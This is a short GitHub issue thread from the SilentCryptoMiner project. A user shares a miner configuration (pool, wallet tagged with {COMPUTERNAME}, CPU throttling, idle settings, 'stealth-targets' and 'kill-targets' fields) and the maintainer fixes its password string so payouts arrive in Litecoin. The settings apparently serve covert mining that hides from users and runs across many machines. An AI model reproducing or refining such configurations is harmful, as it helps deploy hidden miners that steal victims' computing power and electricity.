### ISSUE TITLE
Zephyr pool setup

### ISSUE THREAD

**Issue by LostMySpirit** [UnamSanctam/SilentCryptoMiner#2208]
Quick question:
Does this config even work?

{
    "algo": "rx/0",
    "pool": "randomx.eu.mine.zergpool.com",
    "port": 4453,
    "wallet": "LbMkS7J68gRYpWxSQW9NCLaARBv2gqCnMP.{COMPUTERNAME}",
    "password": "",
    "nicehash": false,
    "ssltls": false,
    "max-cpu": 40,
    "idle-wait": 5,
    "idle-cpu": 70,
    "stealth-targets": "",
    "kill-targets": "",
    "stealth-fullscreen": false
}

So i wan to mine XMR and ZEPH and get payed in ltc

-o stratum+tcp://randomx.eu.mine.zergpool.com:4453 -u (Wallet) -p c=LTC,mc=XMR/ZEPH,ID={COMPUTERNAME}
thats the raw config i got

**Comment by UnamSanctam** [comment]
You need to add the password part (no need to specify XMR/ZEPH since you will mine the most profitable anyways):
`"password": "c=LTC,ID={COMPUTERNAME}",`
